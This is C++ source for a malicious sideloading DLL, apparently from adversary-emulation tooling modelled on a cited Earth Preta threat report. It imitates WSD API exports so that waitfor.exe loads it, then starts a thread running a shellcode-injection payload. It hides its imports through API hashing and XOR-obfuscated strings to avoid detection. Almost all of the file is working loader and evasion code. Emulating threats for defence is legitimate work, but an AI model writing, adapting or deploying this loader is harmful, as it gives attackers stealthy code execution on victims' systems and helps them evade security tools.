#include "handler.hpp"
#include "handler_util.hpp"
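// Returns TRUE only when the host process's main module path is exactly
// C:\Windows\System32\waitfor.exe (compared case-insensitively), FALSE
// otherwise — including when the API cannot be resolved or the call fails.
//
// GetModuleFileNameW is resolved at runtime via RESOLVE_FN_FNV1A and both
// strings go through XorStringW, so neither the import nor the target path
// is present in plaintext in the compiled binary (see handler_util.hpp).
//
// NOTE(review): the drive letter and System32 directory are hard-coded, so a
// host running under a different system root never matches. Deriving the
// directory from GetSystemDirectoryW (resolved the same way) would remove
// that assumption — TODO confirm handler_util.hpp exposes such a typedef.
BOOL InWaitforProcess() {
    GetModuleFileNameW_t fp_GetModuleFileNameW =
        RESOLVE_FN_FNV1A(XorStringW(L"Kernel32.dll"), GetModuleFileNameW);
    if (!fp_GetModuleFileNameW) {
        return FALSE;  // resolver failed: treat as "not the target host"
    }

    wchar_t path[MAX_PATH] = { 0 };
    DWORD len = fp_GetModuleFileNameW(NULL, path, MAX_PATH);

    // len == 0 means the API failed. len >= MAX_PATH means the path was
    // truncated: a truncated path can never equal the short target string,
    // and per the API documentation pre-Vista systems do not NUL-terminate a
    // truncated result, so bail out before _wcsicmp can run past the buffer.
    if (len == 0 || len >= MAX_PATH) {
        return FALSE;
    }

    return _wcsicmp(path, XorStringW(L"C:\\Windows\\System32\\waitfor.exe")) == 0;
}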
/*
 * DllMain:
 * About:
 * DLL entry point. On DLL_PROCESS_ATTACH, when the host is waitfor.exe
 * (see InWaitforProcess), starts a thread running RunPayload, the
 * shellcode injection routine from handler.hpp. Any other reason code,
 * or an attach from any other host, does nothing and returns TRUE.
 * FALSE (which makes the loader unload the DLL) is returned only when
 * the attach happens in waitfor.exe and CreateThread cannot be resolved
 * or the thread cannot be created.
 * NOTE(review): a thread created from DllMain cannot begin executing
 * until the process-attach notifications finish and the loader lock is
 * released; RunPayload must not assume it runs before DllMain returns.
 * CTI:
 * https://www.trendmicro.com/en_us/research/25/b/earth-preta-mixes-legitimate-and-malicious-components-to-sidestep-detection.html
 */

// Resolves CreateThread and starts RunPayload on a new thread. Returns TRUE
// if the thread was created, FALSE if the resolver or CreateThread failed.
// NOTE(review): the thread handle is never closed, so it leaks for the life
// of the process (closing it would not stop the thread). Fixing that needs a
// CloseHandle resolved the same way — TODO confirm handler_util.hpp provides
// a typedef for it.
static BOOL StartPayloadThread(void) {
    CreateThread_t fp_CreateThread =
        RESOLVE_FN_FNV1A(XorStringW(L"Kernel32.dll"), CreateThread);
    if (fp_CreateThread == NULL) {
        return FALSE;
    }
    HANDLE payload_thread = fp_CreateThread(NULL,
                                            0,
                                            (LPTHREAD_START_ROUTINE)RunPayload,
                                            NULL,
                                            0,
                                            NULL);
    return payload_thread != NULL;
}

BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) {
    (void)hinstDLL;
    (void)lpvReserved;

    // Thread attach/detach and process detach need no work.
    if (fdwReason != DLL_PROCESS_ATTACH) {
        return TRUE;
    }
    // Only arm the payload inside the intended sideloading host.
    if (!InWaitforProcess()) {
        return TRUE;
    }
    return StartPayloadThread();
}
// Export with the name and prototype of WSDSetConfigurationOption as declared
// in Wsdutil.h, so a host resolving that name gets this stub instead:
// https://github.com/tpn/winsdk-10/blob/master/Include/10.0.16299.0/um/Wsdutil.h
// All arguments are ignored; the call runs Handler() and reports S_OK (0).
__declspec(dllexport) HRESULT WINAPI
WSDSetConfigurationOption(DWORD dwOption, _In_reads_bytes_(cbInBuffer) LPVOID pVoid, DWORD cbInBuffer) {
    (void)dwOption;
    (void)pVoid;
    (void)cbInBuffer;
    Handler();
    return S_OK;
}
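// Export with the name and prototype of WSDXMLCreateContext as declared in
// Wsdxml.h, so a host resolving that name gets this stub instead:
// https://github.com/tpn/winsdk-10/blob/master/Include/10.0.16299.0/um/Wsdxml.h
// No context is ever created, so the out-pointer is set to NULL (when one was
// supplied) and the call reports E_NOTIMPL. Reporting S_OK here would leave a
// caller holding an uninitialized pointer it believes is valid.
__declspec(dllexport) HRESULT WINAPI
WSDXMLCreateContext(_Outptr_ void** ppContext) {
    if (ppContext != NULL) {
        *ppContext = NULL;
    }
    Handler();
    return E_NOTIMPL;
}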
// Export with the name and prototype of WSDFreeLinkedMemory as declared in
// Wsdutil.h, so a host resolving that name gets this stub instead:
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdutil.h
// Nothing is freed (this module never allocates through the WSD interface);
// the call only runs Handler().
__declspec(dllexport) void WINAPI
WSDFreeLinkedMemory(void *pVoid) {
    (void)pVoid;
    Handler();
}
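// Export with the name and prototype of WSDCreateDiscoveryPublisher as declared
// in Wsddisco.h, so a host resolving that name gets this stub instead:
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsddisco.h
// No publisher is ever created, so the out-pointer is set to NULL (when one
// was supplied) and the call reports E_NOTIMPL instead of S_OK, which would
// leave a caller holding an uninitialized pointer it believes is valid.
__declspec(dllexport) HRESULT WINAPI
WSDCreateDiscoveryPublisher(void* pContext, _Outptr_ void** ppPublisher) {
    (void)pContext;
    if (ppPublisher != NULL) {
        *ppPublisher = NULL;
    }
    Handler();
    return E_NOTIMPL;
}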
// Export with the name and prototype of WSDAttachLinkedMemory as declared in
// Wsdutil.h, so a host resolving that name gets this stub instead:
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdutil.h
// Both arguments are ignored; the call only runs Handler().
__declspec(dllexport) void WINAPI
WSDAttachLinkedMemory(void* pParent, void* pChild) {
    (void)pParent;
    (void)pChild;
    Handler();
}
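// Export with the name and prototype of WSDCreateDeviceHost as declared in
// Wsdhost.h, so a host resolving that name gets this stub instead:
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdhost.h
// No device host is ever created, so the out-pointer is set to NULL (when one
// was supplied) and the call reports E_NOTIMPL instead of S_OK, which would
// leave a caller holding an uninitialized pointer it believes is valid.
__declspec(dllexport) HRESULT WINAPI
WSDCreateDeviceHost(
    _In_ LPCWSTR pszLocalId,
    void* pContext,
    _Outptr_ void** ppDeviceHost) {
    (void)pszLocalId;
    (void)pContext;
    if (ppDeviceHost != NULL) {
        *ppDeviceHost = NULL;
    }
    Handler();
    return E_NOTIMPL;
}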
// Export with the name and prototype of WSDAllocateLinkedMemory as declared in
// Wsdutil.h, so a host resolving that name gets this stub instead:
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdutil.h
// Never allocates: runs Handler() and returns NULL, which a caller reads as
// an allocation failure.
__declspec(dllexport) void * WINAPI
WSDAllocateLinkedMemory(void* pParent, size_t cbSize) {
    (void)pParent;
    (void)cbSize;
    Handler();
    return NULL;
}
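// Export with the name and prototype of WSDCreateDeviceHostAdvanced as declared
// in Wsdhost.h, so a host resolving that name gets this stub instead:
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdhost.h
// No device host is ever created, so the out-pointer is set to NULL (when one
// was supplied) and the call reports E_NOTIMPL instead of S_OK, which would
// leave a caller holding an uninitialized pointer it believes is valid. The
// host-address array is never read.
__declspec(dllexport) HRESULT WINAPI
WSDCreateDeviceHostAdvanced(
    _In_ LPCWSTR pszLocalId,
    void* pContext,
    _In_reads_opt_(dwHostAddressCount) void** ppHostAddresses,
    DWORD dwHostAddressCount,
    _Outptr_ void** ppDeviceHost)
{
    (void)pszLocalId;
    (void)pContext;
    (void)ppHostAddresses;
    (void)dwHostAddressCount;
    if (ppDeviceHost != NULL) {
        *ppDeviceHost = NULL;
    }
    Handler();
    return E_NOTIMPL;
}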
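// Export with the name and prototype of WSDCreateHttpAddress as declared in
// Wsdbase.h, so a host resolving that name gets this stub instead:
// https://github.com/tpn/winsdk-10/blob/9b69fd26ac0c7d0b83d378dba01080e93349c2ed/Include/10.0.16299.0/um/Wsdbase.h
// No address object is ever created, so the out-pointer is set to NULL (when
// one was supplied) and the call reports E_NOTIMPL instead of S_OK, which
// would leave a caller holding an uninitialized pointer it believes is valid.
__declspec(dllexport) HRESULT WINAPI
WSDCreateHttpAddress(_Outptr_ void** ppAddress) {
    if (ppAddress != NULL) {
        *ppAddress = NULL;
    }
    Handler();
    return E_NOTIMPL;
}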